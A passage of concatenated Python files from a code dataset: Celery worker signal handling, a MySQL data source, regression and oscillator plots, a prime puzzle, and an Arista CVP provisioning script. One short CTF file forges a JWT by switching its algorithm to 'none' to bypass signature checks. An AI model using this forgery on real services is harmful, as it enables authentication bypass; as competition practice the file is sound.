self.WorkController(concurrency=self.concurrency,\n loglevel=self.loglevel,\n logfile=self.logfile,\n hostname=self.hostname,\n ready_callback=self.on_listener_ready,\n embed_clockservice=self.run_clockservice,\n schedule_filename=self.schedule,\n send_events=self.events,\n db=self.db,\n max_tasks_per_child=self.max_tasks_per_child,\n task_time_limit=self.task_time_limit,\n task_soft_time_limit=self.task_soft_time_limit)\n self.install_platform_tweaks(worker)\n worker.start()\n\n def install_platform_tweaks(self, worker):\n \"\"\"Install platform specific tweaks and workarounds.\"\"\"\n if IS_OSX:\n self.osx_proxy_detection_workaround()\n\n # Install signal handler so SIGHUP restarts the worker.\n if not self._isatty:\n # only install HUP handler if detached from terminal,\n # so closing the terminal window doesn't restart celeryd\n # into the background.\n if IS_OSX:\n # OS X can't exec from a process using threads.\n # See http://github.com/ask/celery/issues#issue/152\n install_HUP_not_supported_handler(worker)\n else:\n install_worker_restart_handler(worker)\n install_worker_term_handler(worker)\n install_worker_int_handler(worker)\n signals.worker_init.send(sender=worker)\n\n def osx_proxy_detection_workaround(self):\n \"\"\"See http://github.com/ask/celery/issues#issue/161\"\"\"\n os.environ.setdefault(\"celery_dummy_proxy\", \"set_by_celeryd\")\n\n def set_process_status(self, info):\n info = \"%s (%s)\" % (info, platforms.strargv(sys.argv))\n return platforms.set_mp_process_title(\"celeryd\",\n info=info,\n hostname=self.hostname)\n\n def die(self, msg, exitcode=1):\n sys.stderr.write(\"Error: %s\\n\" % (msg, ))\n sys.exit(exitcode)\n\n\ndef install_worker_int_handler(worker):\n\n def _stop(signum, frame):\n process_name = multiprocessing.current_process().name\n if process_name == \"MainProcess\":\n worker.logger.warn(\n \"celeryd: Hitting Ctrl+C again will terminate \"\n \"all running tasks!\")\n install_worker_int_again_handler(worker)\n worker.logger.warn(\"celeryd: Warm shutdown (%s)\" % (\n process_name))\n worker.stop()\n raise SystemExit()\n\n platforms.install_signal_handler(\"SIGINT\", _stop)\n\n\ndef install_worker_int_again_handler(worker):\n\n def _stop(signum, frame):\n process_name = multiprocessing.current_process().name\n if process_name == \"MainProcess\":\n worker.logger.warn(\"celeryd: Cold shutdown (%s)\" % (\n process_name))\n worker.terminate()\n raise SystemExit()\n\n platforms.install_signal_handler(\"SIGINT\", _stop)\n\n\ndef install_worker_term_handler(worker):\n\n def _stop(signum, frame):\n process_name = multiprocessing.current_process().name\n if process_name == \"MainProcess\":\n worker.logger.warn(\"celeryd: Warm shutdown (%s)\" % (\n process_name))\n worker.stop()\n raise SystemExit()\n\n platforms.install_signal_handler(\"SIGTERM\", _stop)\n\n\ndef install_worker_restart_handler(worker):\n\n def restart_worker_sig_handler(signum, frame):\n \"\"\"Signal handler restarting the current python program.\"\"\"\n worker.logger.warn(\"Restarting celeryd (%s)\" % (\n \" \".join(sys.argv)))\n worker.stop()\n os.execv(sys.executable, [sys.executable] + sys.argv)\n\n platforms.install_signal_handler(\"SIGHUP\", restart_worker_sig_handler)\n\n\ndef install_HUP_not_supported_handler(worker):\n\n def warn_on_HUP_handler(signum, frame):\n worker.logger.error(\"SIGHUP not supported: \"\n \"Restarting with HUP is unstable on this platform!\")\n\n platforms.install_signal_handler(\"SIGHUP\", warn_on_HUP_handler)\n\n\ndef run_worker(*args, **kwargs):\n return Worker(*args, **kwargs).run()\n","sub_path":"celery/apps/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":12212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549974967","text":"import json\nimport asyncio\nimport aiomysql\nfrom collections import OrderedDict\nfrom typing import AsyncIterator, NamedTuple, Dict\n\nfrom dffml.base import BaseConfig\nfrom dffml.repo import Repo\nfrom dffml.source.source import BaseSourceContext, BaseSource\nfrom dffml.util.cli.arg import Arg\nfrom dffml.util.entrypoint import entrypoint\n\n\nclass DemoAppSourceConfig(BaseConfig, NamedTuple):\n host: str\n port: int\n user: str\n password: str\n db: str\n\n\nclass DemoAppSourceContext(BaseSourceContext):\n async def update(self, repo: Repo):\n db = self.conn\n # Just dump it (if you want a setup the queries easily, then you need to\n # massage the columns in this table to your liking, and perhaps add more\n # tables.\n marshall = json.dumps(repo.dict())\n await db.execute(\n \"INSERT INTO ml_data (key, json) VALUES(%s, %s) \"\n \"ON DUPLICATE KEY UPDATE json = %s\",\n (repo.key, marshall, marshall),\n )\n self.logger.debug(\"updated: %s\", marshall)\n self.logger.debug(\"update: %s\", await self.repo(repo.key))\n\n async def repos(self) -> AsyncIterator[Repo]:\n await self.conn.execute(\"SELECT key FROM `status`\")\n keys = set(map(lambda row: row[0], await self.conn.fetchall()))\n await self.conn.execute(\"SELECT key FROM `ml_data`\")\n list(map(lambda row: keys.add(row[0]), await self.conn.fetchall()))\n for key in keys:\n yield await self.repo(key)\n\n async def repo(self, key: str):\n repo = Repo(key)\n db = self.conn\n # Get features\n await db.execute(\"SELECT json FROM ml_data WHERE key=%s\", (key,))\n dump = await db.fetchone()\n if dump is not None and dump[0] is not None:\n repo.merge(Repo(key, data=json.loads(dump[0])))\n await db.execute(\n \"SELECT maintained FROM `status` WHERE key=%s\", (key,)\n )\n maintained = await db.fetchone()\n if maintained is not None and maintained[0] is not None:\n repo.evaluated({\"maintained\": str(maintained[0])})\n return repo\n\n async def __aenter__(self) -> \"DemoAppSourceContext\":\n self.__conn = self.parent.db.cursor()\n self.conn = await self.__conn.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_value, traceback):\n await self.__conn.__aexit__(exc_type, exc_value, traceback)\n await self.parent.db.commit()\n\n\n@entrypoint(\"demoapp\")\nclass DemoAppSource(BaseSource):\n\n CONTEXT = DemoAppSourceContext\n\n async def __aenter__(self) -> \"DemoAppSource\":\n self.pool = await aiomysql.create_pool(\n host=self.config.host,\n port=self.config.port,\n user=self.config.user,\n password=self.config.password,\n db=self.config.db,\n )\n self.__db = self.pool.acquire()\n self.db = await self.__db.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_value, traceback):\n await self.__db.__aexit__(exc_type, exc_value, traceback)\n self.pool.close()\n await self.pool.wait_closed()\n\n @classmethod\n def args(cls, args, *above) -> Dict[str, Arg]:\n cls.config_set(args, above, \"host\", Arg(default=\"127.0.0.1\"))\n cls.config_set(args, above, \"port\", Arg(type=int, default=3306))\n cls.config_set(args, above, \"user\", Arg(default=\"user\"))\n cls.config_set(args, above, \"password\", Arg(default=\"pass\"))\n cls.config_set(args, above, \"db\", Arg(default=\"db\"))\n return args\n\n @classmethod\n def config(cls, config, *above):\n return DemoAppSourceConfig(\n host=cls.config_get(config, above, \"host\"),\n port=cls.config_get(config, above, \"port\"),\n user=cls.config_get(config, above, \"user\"),\n password=cls.config_get(config, above, \"password\"),\n db=cls.config_get(config, above, \"db\"),\n )\n","sub_path":"examples/maintained/demoapp/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"16647957","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nx1 = tf.constant([137.97, 104.50, 100.00, 124.32, 79.20, 99.00, 124.00, 114.00,\n 106.69, 138.05, 53.75, 46.91, 68.00, 63.02, 81.26, 86.21])\nx2 = tf.constant([3, 2, 2, 3, 1, 2, 3, 2, 2, 3, 1, 1, 1, 1, 2, 2],dtype = tf.float32)\ny = tf.constant([145.00, 110.00, 93.00, 116.00, 65.32, 104.00, 118.00, 91.00,\n 62.00, 133.00, 51.00, 45.00, 78.50, 69.65, 75.69, 95.30])\n\nx0 = tf.ones(len((x1)),dtype = tf.float32)\nX = tf.stack((x0,x1,x2),axis = 1)\nY = tf.reshape(y,(-1,1))\n\nXt = tf.transpose(X)\nXtX_1 = tf.linalg.inv(tf.matmul(Xt,X))\nXtX_1_Xt = tf.matmul(XtX_1,Xt)\nW = tf.matmul(XtX_1_Xt , Y)\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\nfig = plt.figure(figsize = (8,6))\nax3d = Axes3D(fig)\nax3d.scatter(x1,x2,y,color = \"b\",marker=\"*\")\n\nax3d.set_xlabel('Area',color = 'r',fontsize = 16)\nax3d.set_ylabel('Room',color = 'r' ,fontsize = 16)\nax3d.set_zlabel('Price',color = 'r' ,fontsize = 16)\nax3d.set_yticks([1,2,3])\nax3d.set_zlim3d(30,160)\n\nX1,X2 = tf.meshgrid(x1,x2)\nY_PRED = W[1] * X1 + W[2] * X2 + W[0]\n\nfig2 = plt.figure()\nax3d2 = Axes3D(fig2)\nax3d2.plot_surface(X1,X2,Y_PRED,cmap='coolwarm')\n\nax3d2.set_xlabel('Area',color = 'r',fontsize = 14)\nax3d2.set_ylabel('Room',color = 'r', fontsize = 14)\nax3d2.set_zlabel('Price',color = 'r', fontsize = 14)\nax3d2.set_yticks([1,2,3])\n\ny_pred = W[1] * x1 + W[2] * x2 + W[0]\nfig3 = plt.figure()\nax3d3 = Axes3D(fig3)\nax3d3.scatter(x1,x2,y,color='b',marker='*',label='销售记录')\nax3d3.scatter(x1,x2,y_pred,color = 'r',label = '预测房价')\nax3d3.plot_wireframe(X1,X2,Y_PRED,color='c',linewidths=0.5,label=\"拟合平面\")\nax3d3.set_xlabel('Area',color='r',fontsize= 14)\nax3d3.set_ylabel('Room',color = 'r',fontsize = 14)\nax3d3.set_zlabel('Price',color='r',fontsize=14)\nax3d3.set_yticks([1,2,3])\n\nplt.suptitle('商品房价销售回归模型',fontsize = 20)\nplt.legend(loc='upper left')\n\nplt.show()","sub_path":"housePrice2.py","file_name":"housePrice2.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"277154759","text":"from ShopSystem.models.gp_shop_base_models import *\nfrom portal.models.game import Game\nfrom ShopSystem.models.product import Product\n\n\nclass RelationGameProduct(BaseModel):\n game = ForeignKeyField(db_column='game_id', rel_model=Game, to_field='id')\n product = ForeignKeyField(db_column='product_id', rel_model=Product, to_field='id')\n\n class Meta:\n db_table = 'Relation_for_game_product'\n\n @staticmethod\n def add_game_to_shop(data_):\n RelationGameProduct.create(game=data_['game_id'], product=data_['product_id'])\n return True\n\n @staticmethod\n def status_game_in_product(game_id):\n try:\n product_id = RelationGameProduct.select().where(RelationGameProduct.game == game_id).get().product\n ret = {'success':True, 'shop_link':\"/introduction_game/\" + str(int(product_id.id))}\n except DoesNotExist:\n ret = {'success':False}\n return ret\n\nif __name__ == \"__main__\":\n pass","sub_path":"ShopSystem/models/RelationGameProduct.py","file_name":"RelationGameProduct.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"146734762","text":"import base64\n\n\njwt = b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE1ODI1NjIwMTAsImlhdCI6MTU4MjU1ODQxMCwiaXNzIjoicmVjaXBlYm90IiwibmJmIjoxNTgyNTU4NDEwLCJzdWIiOiI2NzY4N2NmYS1kZDRkLTQ2ZDYtYWM3NS1jMWIzYWQ4YTBkZGQifQ.eJmbryEF7Cb7bo0c5wPc9LN3X3CZLo6e5xjg1Q-Hm_w'\nheader, payload, signature = jwt.split(b'.')\n\n# Replacing the ALGO and the payload username\nheader = base64.b64decode(header).replace(b'HS256', b'none')\npayload = base64.b64decode(payload + b'==')\n\nheader = base64.b64encode(header).strip().replace(b'=', b'')\npayload = base64.b64encode(payload).strip().replace(b'=', b'')\n\n# 'The algorithm 'none' is not supported'\nprint(header + b\".\" + payload + b\".\" + signature)\n","sub_path":"bsidessf2020ctf/recipes/jwt_none.py","file_name":"jwt_none.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422727458","text":"'''\r\n문1) 다음과 같이 다중선형회귀방정식으로 모델의 예측치와 평균제곱오차를 계산하시오.\r\n 조건1> X변수 : 4개, Y변수 : 1개 \r\n 조건1> X변수 공급 데이터 : x_data = [[1.2,2.2,3.5,4.2]] - (1,4)\r\n 조건2> Y변수[정답] : Variable()이용 표준정규분포 난수 상수 1개 \r\n 조건3> a변수[기울기] : Variable()이용 표준정규분포 난수 상수 4개\r\n 조건4> b변수[절편] : Variable()이용 표준정규분포 난수 상수 1개 \r\n 조건5> model 예측치 : pred_Y = (X * a) + b \r\n -> 행렬곱 함수 적용 \r\n 조건6> model 손실함수 출력 \r\n -> 손실함수는 python 함수로 정의 : 함수명 -> loss_fn(err)\r\n\r\n<< 출력 예시 >> \r\na[기울기] = \r\n [[-2.063591 ]\r\n [ 0.10648511]\r\n [ 0.49105361]\r\n [ 0.00555888]]\r\nb[절편] = [[ 1.4659301]]\r\nY[정답] = [[-0.39188424]]\r\npred_Y[예측치] = [[ 0.96592301]]\r\nloss function = = 1.84364 \r\n'''\r\n\r\nimport tensorflow as tf \r\n\r\n# 1. 변수 정의 \r\nX = [[1.2,2.2,3.5,4.2]] # 공급 data\r\nY = tf.Variable(tf.random.normal([1])) # 출력 \r\na = tf.Variable(tf.random.normal([4, 1])) # 기울기(4,1) \r\nb = tf.Variable(tf.random.normal([1])) # 절편\r\n\r\n# 2. model 예측치/오차/손실함수 정의 \r\n\r\n# 3. 결과 출력 \r\n\r\n\r\n\r\n\r\n","sub_path":"chap03_LinearRegression/exams/exam01_regression_formula완성.py","file_name":"exam01_regression_formula완성.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"59682930","text":"##The primes 3, 7, 109, and 673, are quite remarkable. By taking any two primes\n##and concatenating them in any order the result will always be prime. For\n##example, taking 7 and 109, both 7109 and 1097 are prime. The sum of these four\n##primes, 792, represents the lowest sum for a set of four primes with this\n##property.\n##\n##Find the lowest sum for a set of five primes for which any two primes\n##concatenate to produce another prime.\n\nimport time\nfrom gmpy import is_prime\n\nstart = time.time()\n\nprimes = []\nfor i in range(3, 10000):\n if is_prime(i):\n primes.append(i)\n\n# tries both concatenations and returns True if both are primes\ndef concat_test(p1, p2):\n s1 = str(p1) + str(p2)\n if is_prime(int(s1)):\n s2 = str(p2) + str(p1)\n if is_prime(int(s2)):\n return True\n return False\n\ndef check_5(sofar, index):\n for i in range(index + 1, len(primes)):\n## print(sofar)\n works = True\n for p in sofar:\n if not concat_test(p, primes[i]):\n works = False\n break\n if works:\n temp = sofar[:]\n sofar.append(primes[i])\n if len(sofar) == 5:\n print(sum(sofar))\n print(time.time() - start) \n else:\n check_5(sofar, i)\n check_5(temp, i)\n\nprint(check_5([], 0))\n \n \n","sub_path":"code/Python/old/Euler/p60.py","file_name":"p60.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"598127656","text":"import matplotlib.pyplot as plt\nimport math\n\ndef get_variables():\n \"\"\"\n Asks a user for the values of gamma, omega0 and the number of points to \n plot on the graph.\n \"\"\"\n gamma = float(input(\"Please enter a value for gamma: \"))\n omega_zero = float(input(\"Please enter a value for omega: \"))\n points = int(input(\"Please enter the number of points to plot on the \" + \n \"graph: \"))\n \n return gamma, omega_zero, points\n\n\ndef shm(omega_zero, gamma, t):\n \"\"\"Calculates the displacement for a damped simple harmonic oscillator.\"\"\"\n # Checks if the oscillator is critically damped, hence gamma == 2*omega_zero\n if gamma == 2*omega_zero:\n # Calculates the coefficient of damping b for a critically damped \n # oscillator\n b = gamma/2\n return math.exp(-(gamma*t)/2)*(1+b*t)\n # Checks if the oscillator is over damped, hence gamma > 2*omega_zero\n elif gamma > 2*omega_zero:\n p = math.sqrt(((gamma**2)/4)-omega_zero**2)\n # Calculates the coefficient of damping b for an over damped\n # oscillator\n b = gamma/(2*p)\n return math.exp(-(gamma*t)/2)*(math.cosh(p*t)+b*math.sinh(p*t))\n # Checks if the oscillator is under damped, hence gamma < 2*omega_zero\n elif gamma < 2*omega_zero:\n omega = math.sqrt((omega_zero**2)-((gamma**2)/4))\n # Calculates the coefficient of damping b for an under damped\n # oscillator\n b = gamma/(2*omega)\n return math.exp(-(gamma*t)/2)*(math.cos(omega*t)+b*math.sin(omega*t))\n\n\ndef plot_amplitude_against_time(amplitudes, times, damping_type):\n \"\"\"Plots the amplitude of a damped oscillator against time.\"\"\"\n plt.plot(times, amplitudes, \"k\")\n plt.title(\"Amplitude vs Time for a%s Simple Harmonic Oscillator\" % \n (damping_type))\n plt.xlabel(\"Time(s)\")\n plt.ylabel(\"Amplitude x(t) (m)\")\n plt.show()\n\n\ndef main():\n \"\"\"The main method executes the main functionality of the program.\"\"\"\n gamma, omega_zero, points = get_variables()\n times = []\n amplitudes = []\n for i in range(0, points):\n # Calculates the time for each displacement.\n t = (5.0*math.pi*i/points)/omega_zero\n # Appends the current time to the list of times\n times.append(t)\n # Calculates the displacement at the current time and appends it to the \n # list of amplitudes\n amplitudes.append(shm(omega_zero, gamma, t))\n\n # Checks if the oscillator is critically damped in order to change the title\n # of the plot accordingly\n if gamma == 2*omega_zero:\n plot_amplitude_against_time(amplitudes, times, \" Critically Damped\")\n # Checks if the oscillator is over damped in order to change the title\n # of the plot accordingly\n elif gamma > 2*omega_zero:\n plot_amplitude_against_time(amplitudes, times, \"n Over Damped\")\n # Checks if the oscillator is under damped in order to change the title\n # of the plot accordingly\n elif gamma < 2*omega_zero:\n plot_amplitude_against_time(amplitudes, times, \"n Under Damped\") \n\nmain()","sub_path":"check_point_3.py","file_name":"check_point_3.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"274841254","text":"#!/usr/bin/env python3\n\nfrom ruamel.yaml import YAML\nfrom rcvpapi.rcvpapi import *\nimport requests, json, syslog\nfrom os import path, listdir, system\nfrom time import sleep\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ntopo_file = '/etc/ACCESS_INFO.yaml'\nCVP_CONFIG_FILE = '/home/arista/.cvpState.txt'\nCVP_CONTAINERS = []\nFILE_DELAY = 10\n\n# Temporary file_path location for CVP Custom info\ncvp_file = '/home/arista/cvp/cvp_info.yaml'\npDEBUG = False\n\n# ==================================\n# Start of Global Functions\n# ==================================\ndef getTopoInfo(yaml_file):\n \"\"\"\n Function that parses the supplied YAML file to build the CVP topology.\n \"\"\"\n topoInfo = open(yaml_file,'r')\n topoYaml = YAML().load(topoInfo)\n topoInfo.close()\n return(topoYaml)\n\ndef checkContainer(cnt):\n \"\"\"\n Function to check and see if the supplied container is already in the global container list.\n Parameters:\n cnt = Container to add if it does not exist in the list (required)\n \"\"\"\n if cnt not in CVP_CONTAINERS:\n CVP_CONTAINERS.append(cnt)\n\ndef getEosDevice(topo,eosYaml,cvpMapper):\n \"\"\"\n Function that Parses through the YAML file and creates a CVPSWITCH class object for each EOS device in the topo file.\n Parameters:\n topo = Topology for the ATD (required)\n eosYAML = vEOS portion of the ACCESS_INFO.yaml file (required)\n cvpMapper = Dict that maps EOS device to container (required)\n \"\"\"\n EOS_DEV = []\n for dev in eosYaml:\n try:\n EOS_DEV.append(CVPSWITCH(dev['hostname'],dev['internal_ip'],cvpMapper[dev['hostname']]))\n checkContainer(cvpMapper[dev['hostname']])\n except:\n EOS_DEV.append(CVPSWITCH(dev['hostname'],dev['internal_ip']))\n return(EOS_DEV)\n\ndef eosContainerMapper(cvpYaml):\n \"\"\"\n Function that Parses through the YAML file and maps device to container.\n Parameters:\n cvpYaml = cvp containers portion of the cvp_info.yaml file (required)\n \"\"\"\n eMap = {}\n for cnt in cvpYaml.keys():\n if cvpYaml[cnt]:\n for eosD in cvpYaml[cnt]:\n eMap[eosD] = cnt\n return(eMap)\n\ndef pS(mstat,mtype):\n \"\"\"\n Function to send output from service file to Syslog\n Parameters:\n mstat = Message Status, ie \"OK\", \"INFO\" (required)\n mtype = Message to be sent/displayed (required)\n \"\"\"\n mmes = \"\\t\" + mtype\n syslog.syslog(\"[{0}] {1}\".format(mstat,mmes.expandtabs(7 - len(mstat))))\n if pDEBUG:\n print(\"[{0}] {1}\".format(mstat,mmes.expandtabs(7 - len(mstat))))\n\ndef main():\n \"\"\"\n Main Function if this is the initial deployment for the ATD/CVP\n \"\"\"\n cvp_clnt = \"\"\n while not path.exists(topo_file):\n sleep(FILE_DELAY)\n pS(\"INFO\", \"Topo file not found, waiting.\")\n while not path.exists(cvp_file):\n sleep(FILE_DELAY)\n pS(\"INFO\", \"CVP build file not found, waiting.\")\n atd_yaml = getTopoInfo(topo_file)\n cvp_yaml = getTopoInfo(cvp_file)\n eos_cnt_map = eosContainerMapper(cvp_yaml['cvp_info']['containers'])\n eos_info = getEosDevice(atd_yaml['topology'],atd_yaml['nodes']['veos'],eos_cnt_map)\n configlet_location = '/tmp/atd/topologies/{0}/configlets/'.format(atd_yaml['topology'])\n for c_login in atd_yaml['login_info']['cvp']['shell']:\n if c_login['user'] == 'arista':\n while not cvp_clnt:\n try:\n cvp_clnt = CVPCON(atd_yaml['nodes']['cvp'][0]['internal_ip'],c_login['user'],c_login['pw'])\n pS(\"OK\",\"Connected to CVP at {0}\".format(atd_yaml['nodes']['cvp'][0]['internal_ip']))\n except:\n pS(\"ERROR\",\"CVP is currently unavailable....Retrying in 30 seconds.\")\n sleep(30)\n if cvp_clnt:\n # ==========================================\n # Add configlets into CVP\n # ==========================================\n while not path.exists(configlet_location):\n sleep(FILE_DELAY)\n pS(\"INFO\", \"Configlets directory not found, waiting...\")\n if path.exists(configlet_location):\n pS(\"OK\",\"Configlet directory exists\")\n pro_cfglt = listdir(configlet_location)\n for tmp_cfg in pro_cfglt:\n if '.py' in tmp_cfg:\n pS(\"INFO\",\"Adding/Updating {0} configlet builder.\".format(tmp_cfg))\n cbname = tmp_cfg.replace('.py','')\n # !!! Add section to check for .form file to import form list options\n with open(configlet_location + tmp_cfg,'r') as cfglt:\n cvp_clnt.impConfiglet('builder',cbname,cfglt.read())\n elif '.form' in tmp_cfg:\n # Ignoring .form files here\n pass\n else:\n pS(\"INFO\",\"Adding/Updating {0} static configlet.\".format(tmp_cfg))\n with open(configlet_location + tmp_cfg,'r') as cfglt:\n cvp_clnt.impConfiglet('static',tmp_cfg,cfglt.read())\n else:\n pS(\"INFO\",\"No Configlet directory found\")\n # ==========================================\n # Add new containers into CVP\n # ==========================================\n for p_cnt in cvp_yaml['cvp_info']['containers'].keys():\n if p_cnt not in cvp_clnt.containers.keys():\n cvp_clnt.addContainer(p_cnt,\"Tenant\")\n cvp_clnt.saveTopology()\n cvp_clnt.getAllContainers()\n pS(\"OK\",\"Added {0} container\".format(p_cnt))\n else:\n pS(\"INFO\",\"{0} container already exists....skipping\".format(p_cnt))\n # Check and add configlets to containers\n if p_cnt in cvp_yaml['cvp_info']['configlets']['containers'].keys():\n cfgs_cnt_ignore = []\n proposed_cnt_cfgs = cvp_yaml['cvp_info']['configlets']['containers'][p_cnt]\n p_cnt_id = cvp_clnt.getContainerId(p_cnt)[0]['Key']\n existing_cnt_cfgs = cvp_clnt.getConfigletsByContainerId(p_cnt_id)\n if existing_cnt_cfgs:\n for ex_cfg in existing_cnt_cfgs['configletList']:\n if ex_cfg['name'] not in proposed_cnt_cfgs:\n cfgs_cnt_ignore.append(ex_cfg['name'])\n pS(\"OK\",\"Configlets found for {0} container. Will apply\".format(p_cnt))\n cvp_clnt.removeContainerConfiglets(p_cnt, cfgs_cnt_ignore)\n cvp_clnt.addContainerConfiglets(p_cnt, proposed_cnt_cfgs)\n cvp_clnt.applyConfigletsContainers(p_cnt)\n cvp_clnt.saveTopology()\n cvp_clnt.getAllTasks(\"pending\")\n task_response = cvp_clnt.execAllTasks(\"pending\")\n # Perform check to see if there are any existing tasks to be executed\n if task_response:\n pS(\"OK\", \"All pending tasks are executing\")\n for task_id in task_response['ids']:\n task_status = cvp_clnt.getTaskStatus(task_id)['taskStatus']\n while task_status != \"Completed\":\n task_status = cvp_clnt.getTaskStatus(task_id)['taskStatus']\n if task_status == 'Failed':\n pS(\"iBerg\", \"Task ID: {0} Status: {1}\".format(task_id, task_status))\n break\n elif task_status == 'Completed':\n pS(\"INFO\", \"Task ID: {0} Status: {1}\".format(task_id, task_status))\n break\n else:\n pS(\"INFO\", \"Task ID: {0} Status: {1}, Waiting 10 seconds...\".format(task_id, task_status))\n sleep(10)\n else:\n pS(\"INFO\", \"No pending tasks found\")\n # ==========================================\n # Update configlet info for all containers\n # ==========================================\n for p_cnt in cvp_clnt.containers:\n cvp_clnt.updateContainersConfigletsInfo(p_cnt)\n # ==========================================\n # Add devices to Inventory/Provisioning\n # ==========================================\n # Perform initial check and do a group add of devices\n tmp_eos_add = []\n for eos in eos_info:\n # Check to see if the device is already provisioned\n if eos.hostname not in cvp_clnt.inventory.keys():\n pS(\"INFO\",\"Adding {}\".format(eos.hostname))\n tmp_eos_add.append(eos.ip)\n else:\n pS(\"INFO\",\"{} is already added into Provisioning\".format(eos.hostname))\n if tmp_eos_add:\n # Import all devices not \n pS(\"INFO\",\"Importing devices: {0}\".format(\", \".join(tmp_eos_add)))\n cvp_clnt.addDeviceInventory(tmp_eos_add)\n for eos in eos_info:\n # Check to see if the device has a target container\n if eos.targetContainerName:\n pS(\"INFO\", \"{0} is the target container for {1}\".format(eos.targetContainerName, eos.hostname))\n eos.updateContainer(cvp_clnt)\n if eos.targetContainerName != eos.parentContainer[\"name\"]:\n pS(\"INFO\", \"Moving {0} from {1} to {2}\".format(eos.hostname, eos.parentContainer['name'], eos.targetContainerName))\n cvp_clnt.moveDevice(eos)\n try:\n cvp_clnt.genConfigBuilders(eos)\n except KeyError:\n pS(\"INFO\", \"No Configlet Builders Found for {0}\".format(eos.hostname))\n if cvp_yaml['cvp_info']['configlets']['netelements']:\n if eos.hostname in cvp_yaml['cvp_info']['configlets']['netelements']:\n eos_new_cfgs = cvp_yaml['cvp_info']['configlets']['netelements'][eos.hostname]\n # Check to see if there are any existing configlets applied\n tmp_eos_cfgs = cvp_clnt.getConfigletsByNetElementId(eos)\n if tmp_eos_cfgs:\n tmp_cfgs_remove = []\n for cfg in tmp_eos_cfgs['configletList']:\n if cfg['name'] not in eos_new_cfgs and cfg['name'] not in cvp_clnt.containers['Tenant']['configlets']['names'] and cfg['name'] not in cvp_clnt.containers[eos.targetContainerName]['configlets']['names']:\n tmp_cfgs_remove.append(cfg['name'])\n pS(\"INFO\", \"[{0}] Configlets to remove: {1}\".format(eos.hostname, \", \".join(tmp_cfgs_remove)))\n eos.removeConfiglets(cvp_clnt, tmp_cfgs_remove)\n cvp_clnt.addDeviceConfiglets(eos, eos_new_cfgs)\n cvp_clnt.applyConfiglets(eos)\n cvp_clnt.saveTopology()\n pS(\"OK\", \"Topology saved\")\n cvp_clnt.getAllTasks(\"pending\")\n task_response = cvp_clnt.execAllTasks(\"pending\")\n pS(\"OK\", \"All pending tasks are executing\")\n for task_id in task_response['ids']:\n task_status = cvp_clnt.getTaskStatus(task_id)['taskStatus']\n while task_status != \"Completed\":\n task_status = cvp_clnt.getTaskStatus(task_id)['taskStatus']\n if task_status == 'Failed':\n pS(\"iBerg\", \"Task ID: {0} Status: {1}\".format(task_id, task_status))\n break\n elif task_status == 'Completed':\n pS(\"INFO\", \"Task ID: {0} Status: {1}\".format(task_id, task_status))\n else:\n pS(\"INFO\", \"Task ID: {0} Status: {1}, Waiting 10 seconds...\".format(task_id, task_status))\n sleep(10)\n\n # ==========================================\n # Creating Snapshots\n # ==========================================\n if cvp_yaml['cvp_info']['snapshots']:\n for p_snap in cvp_yaml['cvp_info']['snapshots']:\n NEW_SNAP = True\n for e_snap in cvp_clnt.snapshots:\n if p_snap['name'] == e_snap['name']:\n NEW_SNAP = False\n if NEW_SNAP:\n cvp_clnt.createSnapshot(p_snap['name'],p_snap['commands'])\n pS(\"OK\",\"Created {0} Snapshot\".format(p_snap['name']))\n else:\n pS(\"OK\",\"Snapshot {0} already exists\".format(p_snap['name']))\n # Logout and close session to CVP\n cvp_clnt.execLogout()\n pS(\"OK\",\"Logged out of CVP\")\n # Adding section to reboot all vEOS nodes in case \n # multi-agent needs to initialize on initial deployment\n for eos in eos_info:\n pS(\"INFO\", \"Rebooting {0}\".format(eos.hostname))\n system(\"/usr/bin/ssh -f arista@{0} reload now\".format(eos.ip))\n pS(\"OK\", \"{0} has been rebooted.\".format(eos.hostname))\n else:\n pS(\"ERROR\",\"Couldn't connect to CVP\")\n\nif __name__ == '__main__':\n # Open Syslog\n syslog.openlog(logoption=syslog.LOG_PID)\n pS(\"OK\",\"Starting...\")\n\n atd_yaml = getTopoInfo(topo_file)\n if 'cvp' in atd_yaml['nodes']:\n if not path.exists(CVP_CONFIG_FILE):\n # Start the main Service\n pS(\"OK\",\"Initial ATD Topo Boot\")\n main()\n with open(CVP_CONFIG_FILE,'w') as tf:\n tf.write(\"CVP_CONFIGURED\\n\")\n pS(\"OK\",\"Completed CVP Configuration\")\n else:\n pS(\"OK\",\"CVP is already configured\")\n else:\n pS(\"INFO\",\"CVP is not present in this topology, preventing future run of cvpUpdater\")\n with open(CVP_CONFIG_FILE,'w') as tf:\n tf.write(\"CVP_CONFIGURED\\n\")\n","sub_path":"labvm/services/cvpUpdater/cvpUpdater.py","file_name":"cvpUpdater.py","file_ext":"py","file_size_in_byte":13864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"579450952","text":"# coding=utf-8\nfrom __future__ import division\n__author__ = 'ariwaranosai'\n\nfrom tools.schedule import *\nfrom tools.TrivalEvent import TrivalEvent\nfrom 